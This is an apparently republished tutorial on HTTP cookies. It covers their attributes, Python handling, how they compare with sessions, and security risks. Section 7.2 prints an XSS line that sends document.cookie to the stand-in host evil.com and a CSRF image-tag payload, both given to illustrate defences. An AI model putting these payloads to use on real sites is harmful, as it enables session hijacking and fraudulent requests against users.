Comprehensive Guide to HTTP Cookies: Principles, Attributes, Python Usage, and Security

This article provides a thorough overview of HTTP cookies, covering their origin, definition, working principles, attributes, Python manipulation, session comparison, common interview questions, and associated security concerns, all illustrated with examples and code snippets.

Full-Stack Internet Architecture
Full-Stack Internet Architecture
Full-Stack Internet Architecture
Comprehensive Guide to HTTP Cookies: Principles, Attributes, Python Usage, and Security

In the previous tutorial on a Youku Danmu crawler we briefly introduced the concept of cookies; this article offers a complete understanding of HTTP cookies (small biscuits) and related knowledge.

1. Origin

HTTP is stateless, meaning the server cannot know whether two requests come from the same browser, which hinders interactive web applications. To record user actions, developers first used hidden fields, but this was cumbersome. In 1994, Netscape employee Lou Montulli introduced cookies to solve shopping‑cart history, and today all browsers support them.

2. What is a Cookie

A cookie is a piece of special information sent by the server to the client and stored as a text file on the client. Every subsequent request from the client includes this information, allowing the server to track client state.

Cookies are mainly used for:

Session state management (e.g., login status, shopping cart, game scores).

Personalized settings (e.g., user preferences, themes).

Browser behavior tracking (e.g., analytics).

3. Cookie Mechanism

Using a login example, the server validates credentials and returns a Set‑Cookie header. The browser stores the cookie and sends it back in the Cookie header on subsequent requests.

HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15 Aug 2019 21:47:38 GMT; Path=/; Domain=.169it.com; HttpOnly

[response body]

Later request:

GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg

The server reads the cookie to identify the logged‑in user. Because cookies are stored client‑side, they can be modified, which poses security risks. Note that cookies are always transmitted via HTTP headers.

4. Cookie Attributes

A cookie contains several attributes: Name, Value, Domain, Path, Expires/Max‑Age, Size, HttpOnly, Secure. Each attribute’s purpose is explained below.

1. Name & Value

The Name identifies the cookie; the server uses it to retrieve the corresponding Value, which often serves as a key for server‑side data.

2. Domain & Path

Domain specifies which hostnames can access the cookie (e.g., .baidu.com vs .tieba.baidu.com). Path restricts access to a specific URL path (e.g., /test).

3. Expires/Max‑Age

These define the cookie’s lifetime. If omitted, the cookie lasts for the browser session and expires when the browser is closed.

4. Size

Size is the total number of characters in the Name and Value (e.g., id=666 → size 5).

5. HttpOnly

When true, the cookie is sent only in HTTP headers and cannot be accessed via JavaScript, helping mitigate XSS attacks.

6. Secure

If set, the cookie is transmitted only over HTTPS, preventing exposure over insecure connections.

5. Manipulating Cookies with Python

5.1 Generating Cookies

After validating a username and password, a server can set a cookie in the response header. The browser then stores it automatically.

5.2 Retrieving Cookies

Using the requests library, r.cookies returns all cookies, and r.cookies.get_dict() provides them as a dictionary.

5.3 Setting Cookies for Crawling

When scraping, copy the browser’s cookie string into the request headers so the server treats the crawler as a logged‑in user.

6. Session

6.1 Origin

Because cookies are client‑side, visible, and limited in size, sessions were introduced to store user data securely on the server while using a cookie only to hold the session identifier.

6.2 What is a Session

A session is a server‑side object linked to a client via a session ID stored in a cookie. The session persists until the user logs out or the session expires.

6.3 Session Workflow

The first request creates a session and returns a session ID cookie.

Subsequent requests include the session ID cookie, allowing the server to associate requests with the stored session data.

Sessions can be implemented via cookies or URL rewriting; the cookie‑based approach is illustrated in the diagram.

7. Interview Scenarios

7.1 Cookie vs. Session

Both enable client‑server interaction.

Cookies reside on the client, are easy to forge, and less secure.

Sessions reside on the server, consuming server resources but offering better security.

Session implementation methods: Cookie and URL rewriting.

7.2 Security Issues Caused by Cookies

Session hijacking and XSS: Attackers can steal cookies via malicious scripts, e.g.,

(new Image()).src = "http://evil.com/steal?c=" + document.cookie;

HttpOnly cookies mitigate this.

Cross‑Site Request Forgery (CSRF): An attacker can embed an image tag that triggers a state‑changing request using the victim’s cookie, e.g.,

<img src="http://bank.example.com/withdraw?account=bob&amount=1000000">

. Defenses include hidden tokens, confirmation steps, and short cookie lifetimes.

8. Summary

This article covered the fundamentals of HTTP cookies, their attributes, how to manipulate them with Python, the relationship between cookies and sessions, and common security concerns, providing a solid foundation for future web‑crawling and web‑development work.

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

Web DevelopmentSession
Full-Stack Internet Architecture
Written by

Full-Stack Internet Architecture

Introducing full-stack Internet architecture technologies centered on Java

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.